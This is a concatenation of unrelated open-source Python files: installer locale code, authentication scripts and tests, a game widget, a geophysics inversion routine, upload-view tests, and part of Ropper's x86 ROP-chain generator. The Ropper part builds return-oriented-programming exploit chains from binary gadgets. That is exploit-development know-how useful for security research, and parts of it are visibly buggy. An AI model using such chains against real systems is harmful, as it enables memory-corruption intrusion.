text = translations[question]['extended:c']
else:
text = translations[question]['c']
return unicode(text, 'utf-8', 'replace')
# Based on code by Walter Dörwald:
# http://mail.python.org/pipermail/python-list/2007-January/424460.html
def ascii_transliterate(exc):
if not isinstance(exc, UnicodeEncodeError):
raise TypeError("don't know how to handle %r" % exc)
import unicodedata
s = unicodedata.normalize('NFD', exc.object[exc.start])[:1]
if ord(s) in range(128):
return s, exc.start + 1
else:
return u'', exc.start + 1
codecs.register_error('ascii_transliterate', ascii_transliterate)
# Returns a tuple of (current language, sorted choices, display map).
def get_languages(current_language_index=-1, only_installable=False):
import gzip
import PyICU
current_language = "English"
if only_installable:
from apt.cache import Cache
#workaround for an issue where euid != uid and the
#apt cache has not yet been loaded causing a SystemError
#when libapt-pkg tries to load the Cache the first time.
with misc.raised_privileges():
cache = Cache()
languagelist = gzip.open('/usr/lib/ubiquity/localechooser/languagelist.data.gz')
language_display_map = {}
i = 0
for line in languagelist:
line = unicode(line, 'utf-8')
if line == '' or line == '\n':
continue
code, name, trans = line.strip(u'\n').split(u':')[1:]
if code in ('C', 'dz', 'km'):
i += 1
continue
if only_installable:
pkg_name = 'language-pack-%s' % code
#special case these
if pkg_name.endswith('_CN'):
pkg_name = 'language-pack-zh-hans'
elif pkg_name.endswith('_TW'):
pkg_name = 'language-pack-zh-hant'
elif pkg_name.endswith('_NO'):
pkg_name = pkg_name.split('_NO')[0]
elif pkg_name.endswith('_BR'):
pkg_name = pkg_name.split('_BR')[0]
try:
pkg = cache[pkg_name]
if not (pkg.installed or pkg.candidate):
i += 1
continue
except KeyError:
i += 1
continue
language_display_map[trans] = (name, code)
if i == current_language_index:
current_language = trans
i += 1
languagelist.close()
if only_installable:
del cache
try:
# Note that we always collate with the 'C' locale. This is far
# from ideal. But proper collation always requires a specific
# language for its collation rules (languages frequently have
# custom sorting). This at least gives us common sorting rules,
# like stripping accents.
collator = PyICU.Collator.createInstance(PyICU.Locale('C'))
except:
collator = None
def compare_choice(x):
if language_display_map[x][1] == 'C':
return None # place C first
if collator:
try:
return collator.getCollationKey(x).getByteArray()
except:
pass
# Else sort by unicode code point, which isn't ideal either,
# but also has the virtue of sorting like-glyphs together
return x
sorted_choices = sorted(language_display_map, key=compare_choice)
return current_language, sorted_choices, language_display_map
def default_locales():
languagelist = open('/usr/lib/ubiquity/localechooser/languagelist')
defaults = {}
for line in languagelist:
line = unicode(line, 'utf-8')
if line == '' or line == '\n':
continue
bits = line.strip(u'\n').split(u';')
code = bits[0]
locale = bits[4]
defaults[code] = locale
languagelist.close()
return defaults
# vim:ai:et:sts=4:tw=80:sw=4:
| gpl-3.0 | -2,029,924,248,393,744,000 | 36.698507 | 356 | 0.588645 | false |
antont/tundra | src/Application/PythonScriptModule/pymodules_old/simiangrid/auth.py | 1 | 2238 | #httplib was ok and httplib2 especially had nice api, but they don't work thru proxies and stuff
#-- curl is the most robust thing
#import httplib
import curl #a high level wrapper over pycurl bindings
import json
import hashlib #only 'cause has a hardcoded pwd here now - for real this comes from connection or launcher
try:
import naali
except ImportError:
naali = None #so that can test standalone too, without Naali
else:
import circuits
class SimiangridAuthentication(circuits.BaseComponent):
pass #put disconnecting to on_exit here to not leave old versions while reloading
url = "http://localhost/Grid/"
c = curl.Curl()
def simiangrid_auth(url, username, md5hex):
params = {'RequestMethod': 'AuthorizeIdentity',
'Identifier': username,
'Type': 'md5hash',
'Credential': md5hex}
rdata = c.post(url, params)
print rdata
r = json.loads(rdata)
#http://code.google.com/p/openmetaverse/wiki/AuthorizeIdentity
success = r.get('Success', False)
#NOTE: docs say reply should have Success:false upon failure.
#however in my test run it doesn't just the Message of missing/invalid creds
#this code works for that too.
return success
def on_connect(conn_id, userconn):
print userconn.GetLoginData()
username = userconn.GetProperty("username")
username = username.replace('_', ' ') #XXX HACK: tundra login doesn't allow spaces, whereas simiangrid frontend demands them
pwd = userconn.GetProperty("password")
md5hex = hashlib.md5(pwd).hexdigest()
success = simiangrid_auth(url, username, md5hex)
print "Authentication success:", success, "for", conn_id, userconn
if not success:
userconn.DenyConnection()
if naali is not None:
s = naali.server
if s.IsAboutToStart():
s.connect("UserAboutToConnect(int, UserConnection*)", on_connect)
print "simiangrid/auth.py running on server - hooked to authorize connections"
else:
on_connect(17, {'username': "Lady Tron",
'password': "They only want you when you're seventeen"})
"""
{ "Success":true, "UserID":"fe5f5ac3-7b28-4276-ae50-133db72040f0" }
Authentication success: True
"""
| apache-2.0 | -1,794,691,461,481,782,000 | 33.430769 | 128 | 0.689455 | false |
MarkusHackspacher/PythonFarmGame | farmlib/expbar.py | 1 | 2110 | '''
Created on 31-05-2012
@author: orneo1212
'''
import pygame
from pygameui import Label
class ExpBar(Label):
"""ExpBar class
"""
def __init__(self, player):
self.player = player
self.oldexp = -1.0
Label.__init__(self, "", (9, 58))
def update_text(self):
"""update text
:return:
"""
# get data
exp = self.player.exp
nextlvlexp = self.player.nextlvlexp
level = self.player.level
self.oldexp = self.player.exp
# calculate progress and set text
progress = int(exp / nextlvlexp * 100)
self.settext("Level: " + str(level) + " Exp: {0!s}/{1!s} ({2!s} %)".
format(int(exp), int(nextlvlexp), progress))
def update(self):
"""update
:return:
"""
if self.oldexp != self.player.exp:
self.repaint()
def repaint(self):
"""repaint
:return:
"""
self.update_text()
self.size = self.width, self.height = ((48 + 2) * 6 - 1, 16)
self.create_widget_image()
# draw background
pygame.draw.rect(self.img, (0, 32, 0),
(1, 1, self.width - 1, self.height - 1))
# draw background (progress)
progresswidth = self.width / self.player.nextlvlexp * self.player.exp
pygame.draw.rect(self.img, (0, 100, 0),
(1, 1, int(progresswidth) - 1, self.height - 1))
# draw border
pygame.draw.rect(self.img, (0, 255, 0),
(1, 1, self.width - 1, self.height - 1), 1)
# draw text
text = self.gettext()
txtimg = self.labelfont.render(text, 0, (64, 255, 100), (255, 0, 255))
txtimg.set_colorkey((255, 0, 255))
# Draw centered
px = self.width / 2 - txtimg.get_size()[0] / 2
py = self.height / 2 - txtimg.get_size()[1] / 2
self.img.blit(txtimg, (px, py))
def redraw(self, surface):
"""redraw
:param surface:
:return:
"""
surface.blit(self.img, self.position)
| gpl-3.0 | 8,185,247,811,750,345,000 | 26.402597 | 78 | 0.507109 | false |
openzim/zimfarm | dispatcher/backend/src/tests/integration/routes/users/test_auth.py | 1 | 4647 | import os
import base64
import pathlib
import datetime
import tempfile
import subprocess
import pytest
OPENSSL_BIN = os.getenv("OPENSSL_BIN", "openssl")
class TestAuthentication:
def do_test_token(self, client, token):
headers = {"Authorization": token, "Content-Type": "application/json"}
response = client.get("/auth/test", headers=headers)
assert response.status_code == 204
def do_get_token_with(self, client, username, password):
headers = {"Content-Type": "application/x-www-form-urlencoded"}
response = client.post(
"/auth/authorize",
headers=headers,
data=f"username={username}&password={password}",
)
return response
@pytest.mark.parametrize(
"username, password, assert_code",
[
("some-user", "hop", 401),
("some-user2", "some-password", 401),
("some-user", "some-password", 200),
],
)
def test_credentials(self, client, user, username, password, assert_code):
response = self.do_get_token_with(client, username, password)
assert response.status_code == assert_code
if assert_code == 200:
response_json = response.get_json()
assert "access_token" in response_json
self.do_test_token(client, response_json["access_token"])
def test_refresh_token(self, client, user):
response = self.do_get_token_with(client, "some-user", "some-password")
assert response.status_code == 200
response_json = response.get_json()
access_token = response_json["access_token"]
refresh_token = response_json["refresh_token"]
headers = {
"Authorization": access_token,
"Content-Type": "application/json",
"refresh-token": refresh_token,
}
assert client.post("/auth/token", headers=headers).status_code == 200
headers["refresh-token"] = "".join(headers["refresh-token"][:-1])
assert client.post("/auth/token", headers=headers).status_code == 401
@pytest.mark.parametrize(
"username, key_to_use, assert_code",
[
("some-user", "good", 200),
("some-user2", "good", 401),
("some-user", "bad", 401),
("some-user", "none", 401),
],
)
def test_ssh(
self,
client,
user,
working_private_key,
not_working_private_key,
username,
key_to_use,
assert_code,
):
key = {"good": working_private_key, "bad": not_working_private_key}.get(
key_to_use,
"-----BEGIN RSA PRIVATE KEY-----\nnope\n-----END RSA PRIVATE KEY-----\n",
)
if key_to_use == "none":
with pytest.raises(IOError):
self.do_test_ssh(client, key, username)
else:
response = self.do_test_ssh(client, key, username)
if response.status_code != assert_code:
print(response.get_json())
assert response.status_code == assert_code
if assert_code == 200:
self.do_test_token(client, response.get_json()["access_token"])
def do_test_ssh(self, client, private_key, username):
# build the SSH payload
now = datetime.datetime.utcnow()
message = f"{username}:{now.isoformat()}"
tmp_dir = pathlib.Path(tempfile.mkdtemp())
# write private key to a temp file
private_key_path = tmp_dir.joinpath("key")
with open(private_key_path, "wb") as fp:
fp.write(private_key.encode("ASCII"))
message_path = tmp_dir.joinpath("message")
signatured_path = tmp_dir.joinpath(f"{message_path.name}.sig")
with open(message_path, "w", encoding="ASCII") as fp:
fp.write(message)
pkey_util = subprocess.run(
[
OPENSSL_BIN,
"pkeyutl",
"-sign",
"-inkey",
str(private_key_path),
"-in",
str(message_path),
"-out",
signatured_path,
]
)
if pkey_util.returncode != 0:
raise IOError("unable to sign authentication payload")
with open(signatured_path, "rb") as fp:
b64_signature = base64.b64encode(fp.read())
headers = {
"Content-type": "application/json",
"X-SSHAuth-Message": message,
"X-SSHAuth-Signature": b64_signature,
}
return client.post("/auth/ssh_authorize", headers=headers)
| gpl-3.0 | 1,822,117,277,133,348,900 | 32.431655 | 85 | 0.55283 | false |
simpeg/simpeg | SimPEG/EM/Static/IP/Run.py | 1 | 2114 | import numpy as np
from SimPEG import (Maps, DataMisfit, Regularization,
Optimization, Inversion, InvProblem, Directives)
def run_inversion(
m0, survey, actind, mesh,
std, eps,
maxIter=15, beta0_ratio=1e0,
coolingFactor=5, coolingRate=2,
upper=np.inf, lower=-np.inf,
use_sensitivity_weight=False,
alpha_s=1e-4,
alpha_x=1.,
alpha_y=1.,
alpha_z=1.,
):
"""
Run IP inversion
"""
dmisfit = DataMisfit.l2_DataMisfit(survey)
uncert = abs(survey.dobs) * std + eps
dmisfit.W = 1./uncert
# Map for a regularization
regmap = Maps.IdentityMap(nP=int(actind.sum()))
# Related to inversion
if use_sensitivity_weight:
reg = Regularization.Sparse(
mesh, indActive=actind, mapping=regmap
)
reg.alpha_s = alpha_s
reg.alpha_x = alpha_x
reg.alpha_y = alpha_y
reg.alpha_z = alpha_z
else:
reg = Regularization.Sparse(
mesh, indActive=actind, mapping=regmap,
cell_weights=mesh.vol[actind]
)
reg.alpha_s = alpha_s
reg.alpha_x = alpha_x
reg.alpha_y = alpha_y
reg.alpha_z = alpha_z
opt = Optimization.ProjectedGNCG(maxIter=maxIter, upper=upper, lower=lower)
invProb = InvProblem.BaseInvProblem(dmisfit, reg, opt)
beta = Directives.BetaSchedule(
coolingFactor=coolingFactor, coolingRate=coolingRate
)
betaest = Directives.BetaEstimate_ByEig(beta0_ratio=beta0_ratio)
target = Directives.TargetMisfit()
# Need to have basice saving function
if use_sensitivity_weight:
updateSensW = Directives.UpdateSensitivityWeights()
update_Jacobi = Directives.UpdatePreconditioner()
directiveList = [
beta, betaest, target, update_Jacobi
]
else:
directiveList = [
beta, betaest, target
]
inv = Inversion.BaseInversion(
invProb, directiveList=directiveList
)
opt.LSshorten = 0.5
opt.remember('xc')
# Run inversion
mopt = inv.run(m0)
return mopt, invProb.dpred
| mit | 3,890,722,355,732,215,300 | 28.361111 | 79 | 0.621097 | false |
MuckRock/muckrock | muckrock/fine_uploader/tests.py | 1 | 6657 | """
Tests for fine uploader integration
"""
# Django
from django.test import RequestFactory, TestCase
from django.urls import reverse
# Standard Library
import json
# Third Party
from nose.tools import assert_false, eq_
# MuckRock
from muckrock.core.factories import UserFactory
from muckrock.fine_uploader import views
from muckrock.foia.factories import FOIARequestFactory, OutboundRequestAttachmentFactory
from muckrock.foia.models import OutboundRequestAttachment
class TestFineUploaderSuccessView(TestCase):
"""Tests for fine uploader success view"""
def test_success_success(self):
"""Test a successful post to the success view"""
foia = FOIARequestFactory()
request_factory = RequestFactory()
request = request_factory.post(
reverse("fine-uploader-success-request"), {"id": foia.pk, "key": "file_key"}
)
request.user = foia.user
response = views.success_request(request)
eq_(response.status_code, 200)
attachment = OutboundRequestAttachment.objects.get(foia=foia)
eq_(attachment.ffile.name, "file_key")
eq_(attachment.user, foia.user)
assert_false(attachment.sent)
def test_success_bad_comm(self):
"""Test a post to the success view with a non-existent foia"""
request_factory = RequestFactory()
request = request_factory.post(
reverse("fine-uploader-success-request"), {"id": 1234, "key": "file_key"}
)
request.user = UserFactory()
response = views.success_request(request)
eq_(response.status_code, 400)
def test_success_bad_user(self):
"""Test a post to the success view with a bad user"""
foia = FOIARequestFactory()
request_factory = RequestFactory()
request = request_factory.post(
reverse("fine-uploader-success-request"), {"id": foia.pk, "key": "file_key"}
)
request.user = UserFactory()
response = views.success_request(request)
eq_(response.status_code, 403)
def test_success_bad_data(self):
"""Test a post to the success view with missing data"""
foia = FOIARequestFactory()
request_factory = RequestFactory()
request = request_factory.post(
reverse("fine-uploader-success-request"), {"id": foia.pk}
)
request.user = foia.user
response = views.success_request(request)
eq_(response.status_code, 400)
class TestFineUploaderSessionView(TestCase):
"""Tests for fine uploader session view"""
def test_session_success(self):
"""Test a successful post to the session view"""
foia = FOIARequestFactory()
attachments = OutboundRequestAttachmentFactory.create_batch(
3, foia=foia, user=foia.user, sent=False
)
OutboundRequestAttachmentFactory.create_batch(
3, foia=foia, user=foia.user, sent=True
)
OutboundRequestAttachmentFactory.create_batch(3)
request_factory = RequestFactory()
request = request_factory.get(
reverse("fine-uploader-session-request"), {"id": foia.pk}
)
request.user = foia.user
response = views.session_request(request)
eq_(response.status_code, 200)
attm_data = json.loads(response.content)
attm_data.sort(key=lambda f: f["uuid"])
attachments.sort(key=lambda f: f.pk)
for attm_datum, attm in zip(attm_data, attachments):
eq_(attm_datum["name"], attm.name())
eq_(attm_datum["uuid"], attm.pk)
eq_(attm_datum["size"], attm.ffile.size)
eq_(attm_datum["s3Key"], attm.ffile.name)
def test_session_bad_comm(self):
"""Test a post to the session view with a non-existent foia"""
request_factory = RequestFactory()
request = request_factory.get(
reverse("fine-uploader-session-request"), {"id": 1234}
)
request.user = UserFactory()
response = views.session_request(request)
eq_(response.status_code, 400)
def test_session_bad_user(self):
"""Test a post to the session view with a bad user"""
foia = FOIARequestFactory()
request_factory = RequestFactory()
request = request_factory.get(
reverse("fine-uploader-session-request"),
{"id": foia.pk, "name": "file_name", "key": "file_key"},
)
request.user = UserFactory()
response = views.session_request(request)
eq_(response.status_code, 403)
class TestFineUploaderDeleteView(TestCase):
"""Tests for fine uploader delete view"""
def test_delete_success(self):
"""Test a successful post to the delete view"""
attm = OutboundRequestAttachmentFactory()
request_factory = RequestFactory()
request = request_factory.post(
reverse("fine-uploader-delete-request", kwargs={"idx": attm.pk})
)
request.user = attm.user
response = views.delete_request(request, attm.pk)
eq_(response.status_code, 200)
assert_false(OutboundRequestAttachment.objects.filter(pk=attm.pk).exists())
def test_delete_bad_file(self):
"""Test a post to the delete view with a non-existent file"""
request_factory = RequestFactory()
request = request_factory.post(
reverse("fine-uploader-delete-request", kwargs={"idx": 123456})
)
request.user = UserFactory()
response = views.delete_request(request, 123456)
eq_(response.status_code, 400)
def test_delete_bad_user(self):
"""Test a post to the delete view with a bad user"""
attm = OutboundRequestAttachmentFactory()
request_factory = RequestFactory()
request = request_factory.post(
reverse("fine-uploader-delete-request", kwargs={"idx": attm.pk})
)
request.user = UserFactory()
attm.user = request.user
attm.save()
response = views.delete_request(request, attm.pk)
eq_(response.status_code, 403)
class TestFineUploaderSignView(TestCase):
"""Tests for fine uploader delete view"""
class TestFineUploaderKeyView(TestCase):
"""Tests for fine uploader delete view"""
class TestFineUploaderBlankView(TestCase):
"""Tests for fine uploader blank view"""
def test_blank(self):
"""Test the blank view"""
request_factory = RequestFactory()
request = request_factory.get(reverse("fine-uploader-blank"))
request.user = UserFactory()
response = views.blank(request)
eq_(response.status_code, 200)
| agpl-3.0 | -1,638,733,558,375,629,300 | 35.576923 | 88 | 0.637224 | false |
howknows/Ropper | ropperapp/disasm/chain/arch/ropchainx86.py | 1 | 36189 | # coding=utf-8
#
# Copyright 2014 Sascha Schirra
#
# This file is part of Ropper.
#
# Ropper is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ropper is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from ropperapp.disasm.gadget import Category
from ropperapp.common.error import *
from ropperapp.common.utils import *
from ropperapp.disasm.rop import Ropper
from ropperapp.disasm.arch import x86
from ropperapp.disasm.chain.ropchain import *
from ropperapp.loaders.loader import Type
from re import match
import itertools
import math
class RopChainX86(RopChain):
MAX_QUALI = 7
def _printHeader(self):
toReturn = ''
toReturn += ('#!/usr/bin/env python\n')
toReturn += ('# Generated by ropper ropchain generator #\n')
toReturn += ('from struct import pack\n')
toReturn += ('\n')
toReturn += ('p = lambda x : pack(\'I\', x)\n')
toReturn += ('\n')
return toReturn
def _printRebase(self):
toReturn = ''
for binary,section in self._usedBinaries:
imageBase = binary.manualImagebase + section.offset if binary.manualImagebase != None else section.virtualAddress
toReturn += ('IMAGE_BASE_%d = %s # %s\n' % (self._usedBinaries.index((binary, section)),toHex(imageBase , 4), binary.fileName))
toReturn += ('rebase_%d = lambda x : p(x + IMAGE_BASE_%d)\n\n'% (self._usedBinaries.index((binary, section)),self._usedBinaries.index((binary, section))))
return toReturn
@classmethod
def name(cls):
return ''
@classmethod
def availableGenerators(cls):
return [RopChainX86System, RopChainX86Mprotect, RopChainX86VirtualProtect]
@classmethod
def archs(self):
return [x86]
def _createDependenceChain(self, gadgets):
"""
gadgets - list with tuples
tuple contains:
- method to create chaingadget
- list with arguments
- dict with named arguments
- list with registers which are not allowed to override in the gadget
"""
failed = []
cur_len = 0
cur_chain = ''
counter = 0
max_perm = math.factorial(len(gadgets))
for x in itertools.permutations(gadgets):
counter += 1
self._printer.puts('\r[*] Try permuation %d / %d' % (counter, max_perm))
found = False
for y in failed:
if x[:len(y)] == y:
found = True
break
if found:
continue
try:
fail = []
chain2 = ''
dontModify = []
badRegs = []
c = 0
for idx in range(len(x)):
g = x[idx]
if idx != 0:
badRegs.extend(x[idx-1][3])
dontModify.extend(g[3])
fail.append(g)
chain2 += g[0](*g[1], badRegs=badRegs, dontModify=dontModify,**g[2])[0]
cur_chain += chain2
break
except RopChainError as e:
pass
if len(fail) > cur_len:
cur_len = len(fail)
cur_chain = '# Filled registers: '
for fa in fail[:-1]:
cur_chain += (fa[2]['reg']) + ', '
cur_chain += '\n'
cur_chain += chain2
failed.append(tuple(fail))
else:
self._printer.println('')
self._printer.printInfo('Cannot create chain which fills all registers')
# print('Impossible to create complete chain')
self._printer.println('')
return cur_chain
def _isModifiedOrDereferencedAccess(self, gadget, dontModify):
regs = []
for line in gadget.lines[1:]:
line = line[1]
if '[' in line:
return True
if dontModify:
m = match('[a-z]+ (e?[abcds][ixlh]),?.*', line)
if m and m.group(1) in dontModify:
return True
return False
def _paddingNeededFor(self, gadget):
regs = []
for idx in range(1,len(gadget.lines)):
line = gadget.lines[idx][1]
matched = match('^pop (...)$', line)
if matched:
regs.append(matched.group(1))
return regs
def _printRopInstruction(self, gadget, padding=True):
toReturn = ('rop += rebase_%d(%s) # %s\n' % (self._usedBinaries.index((gadget._binary, gadget._section)),toHex(gadget.lines[0][0],4), gadget.simpleInstructionString()))
if padding:
regs = self._paddingNeededFor(gadget)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
return toReturn
def _printAddString(self, string):
return ('rop += \'%s\'\n' % string)
def _printRebasedAddress(self, addr, comment='', idx=0):
return ('rop += rebase_%d(%s)\n' % (idx,addr))
def _printPaddingInstruction(self, addr='0xdeadbeef'):
return ('rop += p(%s)\n' % addr)
def _containsZeroByte(self, addr):
return addr & 0xff == 0 or addr & 0xff00 == 0 or addr & 0xff0000 == 0 or addr & 0xff000000 == 0
def _createZeroByteFillerForSub(self, number):
start = 0x01010101
for i in xrange(start, 0x02020202):
if not self._containsZeroByte(i) and not self._containsZeroByte(i+number):
return i
def _createZeroByteFillerForAdd(self, number):
start = 0x01010101
for i in xrange(start, 0x02020202):
if not self._containsZeroByte(i) and not self._containsZeroByte(number-i):
return i
def _find(self, category, reg=None, srcdst='dst', badDst=[], badSrc=None, dontModify=None, srcEqDst=False, switchRegs=False ):
quali = 1
while quali < RopChainX86System.MAX_QUALI:
for binary in self._binaries:
for section, gadgets in binary.gadgets.items():
for gadget in gadgets:
if gadget.category[0] == category and gadget.category[1] == quali:
if badSrc and gadget.category[2]['src'] in badSrc:
continue
if badDst and gadget.category[2]['dst'] in badDst:
continue
if not gadget.lines[len(gadget.lines)-1][1].strip().endswith('ret') or 'esp' in gadget.simpleString():
continue
if srcEqDst and (not (gadget.category[2]['dst'] == gadget.category[2]['src'])):
continue
elif not srcEqDst and 'src' in gadget.category[2] and (gadget.category[2]['dst'] == gadget.category[2]['src']):
continue
if self._isModifiedOrDereferencedAccess(gadget, dontModify):
continue
if reg:
if gadget.category[2][srcdst] == reg:
if (gadget._binary, gadget._section) not in self._usedBinaries:
self._usedBinaries.append((gadget._binary, gadget._section))
return gadget
elif switchRegs:
other = 'src' if srcdst == 'dst' else 'dst'
if gadget.category[2][other] == reg:
if (gadget._binary, gadget._section) not in self._usedBinaries:
self._usedBinaries.append((gadget._binary, gadget._section))
return gadget
else:
if (gadget._binary, gadget._section) not in self._usedBinaries:
self._usedBinaries.append((gadget._binary, gadget._section))
return gadget
quali += 1
def _createWriteStringWhere(self, what, where, reg=None, dontModify=[], idx=0):
badRegs = []
badDst = []
while True:
popReg = self._find(Category.LOAD_REG, reg=reg, badDst=badRegs, dontModify=dontModify)
if not popReg:
raise RopChainError('Cannot build writewhatwhere gadget!')
write4 = self._find(Category.WRITE_MEM, reg=popReg.category[2]['dst'], badDst=
badDst, srcdst='src')
if not write4:
badRegs.append(popReg.category[2]['dst'])
continue
else:
popReg2 = self._find(Category.LOAD_REG, reg=write4.category[2]['dst'], dontModify=[popReg.category[2]['dst']]+dontModify)
if not popReg2:
badDst.append(write4.category[2]['dst'])
continue
else:
break;
if len(what) % 4 > 0:
what += ' ' * (4 - len(what) % 4)
toReturn = ''
for index in range(0,len(what),4):
part = what[index:index+4]
toReturn += self._printRopInstruction(popReg,False)
toReturn += self._printAddString(part)
regs = self._paddingNeededFor(popReg)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
toReturn += self._printRopInstruction(popReg2, False)
toReturn += self._printRebasedAddress(toHex(where+index,4), idx=idx)
regs = self._paddingNeededFor(popReg2)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
toReturn += self._printRopInstruction(write4)
return (toReturn,popReg.category[2]['dst'], popReg2.category[2]['dst'])
def _createWriteRegValueWhere(self, what, where, dontModify=[], idx=0):
badRegs = []
badDst = []
while True:
write4 = self._find(Category.WRITE_MEM, reg=what, badDst=badDst, dontModify=dontModify, srcdst='src')
if not write4:
raise RopChainError('Cannot build writewhatwhere gadget!')
else:
popReg2 = self._find(Category.LOAD_REG, reg=write4.category[2]['dst'], dontModify=[what]+dontModify)
if not popReg2:
badDst.append(write4.category[2]['dst'])
continue
else:
break;
toReturn = self._printRopInstruction(popReg2, False)
toReturn += self._printRebasedAddress(toHex(where,4), idx=idx)
regs = self._paddingNeededFor(popReg2)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
toReturn += self._printRopInstruction(write4)
return (toReturn,what, popReg2.category[2]['dst'])
def _createLoadRegValueFrom(self, what, from_reg, dontModify=[], idx=0):
try:
return self._createLoadRegValueFromMov(what, from_reg, dontModify, idx)
except:
return self._createLoadRegValueFromXchg(what, from_reg, dontModify, idx)
def _createLoadRegValueFromMov(self, what, from_reg, dontModify=[], idx=0):
badRegs = []
badDst = []
while True:
load4 = self._find(Category.LOAD_MEM, reg=what, badDst=badDst, dontModify=dontModify, srcdst='dst')
if not load4:
raise RopChainError('Cannot build loadwhere gadget!')
else:
popReg2 = self._find(Category.LOAD_REG, reg=load4.category[2]['src'], dontModify=[what,load4.category[2]['src']]+dontModify)
if not popReg2:
badDst.append(load4.category[2]['src'])
continue
else:
break;
toReturn = self._printRopInstruction(popReg2, False)
toReturn += self._printRebasedAddress(toHex(from_re,4), idx=idx)
regs = self._paddingNeededFor(popReg2)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
toReturn += self._printRopInstruction(load4)
return (toReturn,what, popReg2.category[2]['dst'])
def _createLoadRegValueFromXchg(self, what, from_reg, dontModify=[], idx=0):
badRegs = []
badDst = []
while True:
load4 = self._find(Category.XCHG_REG, reg=what, badDst=badDst, dontModify=dontModify, srcdst='src')
if not load4:
raise RopChainError('Cannot build loadwhere gadget!')
else:
mov = self._find(Category.LOAD_MEM, reg=load4.category[2]['dst'], badDst=badDst, dontModify=[load4.category[2]['dst']]+dontModify, srcdst='dst')
if not mov:
badDst.append(load4.category[2]['dst'])
continue
popReg2 = self._find(Category.LOAD_REG, reg=mov.category[2]['src'], dontModify=[what,load4.category[2]['src']]+dontModify)
if not popReg2:
badDst.append(load4.category[2]['src'])
continue
else:
break;
toReturn = self._printRopInstruction(popReg2, False)
toReturn += self._printRebasedAddress(toHex(from_reg,4), idx=idx)
regs = self._paddingNeededFor(popReg2)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
toReturn += self._printRopInstruction(mov)
toReturn += self._printRopInstruction(load4)
return (toReturn,what, popReg2.category[2]['dst'])
def _createNumberSubtract(self, number, reg=None, badRegs=None, dontModify=None):
if not badRegs:
badRegs=[]
while True:
sub = self._find(Category.SUB_REG, reg=reg, badDst=badRegs, badSrc=badRegs, dontModify=dontModify)
if not sub:
raise RopChainError('Cannot build number with subtract gadget for reg %s!' % reg)
popSrc = self._find(Category.LOAD_REG, reg=sub.category[2]['src'], dontModify=dontModify)
if not popSrc:
badRegs.append=[sub.category[2]['src']]
continue
popDst = self._find(Category.LOAD_REG, reg=sub.category[2]['dst'], dontModify=[sub.category[2]['src']]+dontModify)
if not popDst:
badRegs.append=[sub.category[2]['dst']]
continue
else:
break;
filler = self._createZeroByteFillerForSub(number)
toReturn = self._printRopInstruction(popSrc, False)
toReturn += self._printPaddingInstruction(toHex(filler,4))
regs = self._paddingNeededFor(popSrc)
for i in range(len(regs)):
toReturn += self._printPaddingInstruction()
toReturn += self._printRopInstruction(popDst, False)
toReturn += self._printPaddingInstruction(toHex(filler+number,4))
regs = self._paddingNeededFor(popDst)
for i in range(len(regs)):
toReturn += self._printPaddingInstruction()
toReturn += self._printRopInstruction(sub)
return (toReturn, popDst.category[2]['dst'],popSrc.category[2]['dst'])
def _createNumberAddition(self, number, reg=None, badRegs=None, dontModify=None):
if not badRegs:
badRegs=[]
while True:
sub = self._find(Category.ADD_REG, reg=reg, badDst=badRegs, badSrc=badRegs, dontModify=dontModify)
if not sub:
raise RopChainError('Cannot build number with addition gadget for reg %s!' % reg)
popSrc = self._find(Category.LOAD_REG, reg=sub.category[2]['src'], dontModify=dontModify)
if not popSrc:
badRegs.append=[sub.category[2]['src']]
continue
popDst = self._find(Category.LOAD_REG, reg=sub.category[2]['dst'], dontModify=[sub.category[2]['src']]+dontModify)
if not popDst:
badRegs.append(sub.category[2]['dst'])
continue
else:
break;
filler = self._createZeroByteFillerForAdd(number)
toReturn = self._printRopInstruction(popSrc, False)
toReturn += self._printPaddingInstruction(toHex(filler,4))
regs = self._paddingNeededFor(popSrc)
for i in range(len(regs)):
toReturn += self._printPaddingInstruction()
toReturn += self._printRopInstruction(popDst, False)
toReturn += self._printPaddingInstruction(toHex(number - filler,4))
regs = self._paddingNeededFor(popDst)
for i in range(len(regs)):
toReturn += self._printPaddingInstruction()
toReturn += self._printRopInstruction(sub)
return (toReturn, popDst.category[2]['dst'],popSrc.category[2]['dst'])
def _createNumberPop(self, number, reg=None, badRegs=None, dontModify=None):
while True:
popReg = self._find(Category.LOAD_REG, reg=reg, badDst=badRegs,dontModify=dontModify)
if not popReg:
raise RopChainError('Cannot build number with xor gadget!')
incReg = self._find(Category.INC_REG, reg=popReg.category[2]['dst'], dontModify=dontModify)
if not incReg:
if not badRegs:
badRegs = []
badRegs.append(popReg.category[2]['dst'])
else:
break
toReturn = self._printRopInstruction(popReg)
toReturn += self._printPaddingInstruction(toHex(0xffffffff,4))
for i in range(number+1):
toReturn += self._printRopInstruction(incReg)
return (toReturn ,popReg.category[2]['dst'],)
def _createNumberXOR(self, number, reg=None, badRegs=None, dontModify=None):
while True:
clearReg = self._find(Category.CLEAR_REG, reg=reg, badDst=badRegs, badSrc=badRegs,dontModify=dontModify, srcEqDst=True)
if not clearReg:
raise RopChainError('Cannot build number with xor gadget!')
if number > 0:
incReg = self._find(Category.INC_REG, reg=clearReg.category[2]['src'], dontModify=dontModify)
if not incReg:
if not badRegs:
badRegs = []
badRegs.append(clearReg.category[2]['src'])
else:
break
else:
break
toReturn = self._printRopInstruction(clearReg)
for i in range(number):
toReturn += self._printRopInstruction(incReg)
return (toReturn, clearReg.category[2]['dst'],)
def _createNumberXchg(self, number, reg=None, badRegs=None, dontModify=None):
xchg = self._find(Category.XCHG_REG, reg=reg, badDst=badRegs, dontModify=dontModify)
if not xchg:
raise RopChainError('Cannot build number gadget with xchg!')
other = xchg.category[2]['src'] if xchg.category[2]['dst'] else xchg.category[2]['dst']
toReturn = self._createNumber(number, other, badRegs, dontModify)[0]
toReturn += self._printRopInstruction(xchg)
return (toReturn, reg, other)
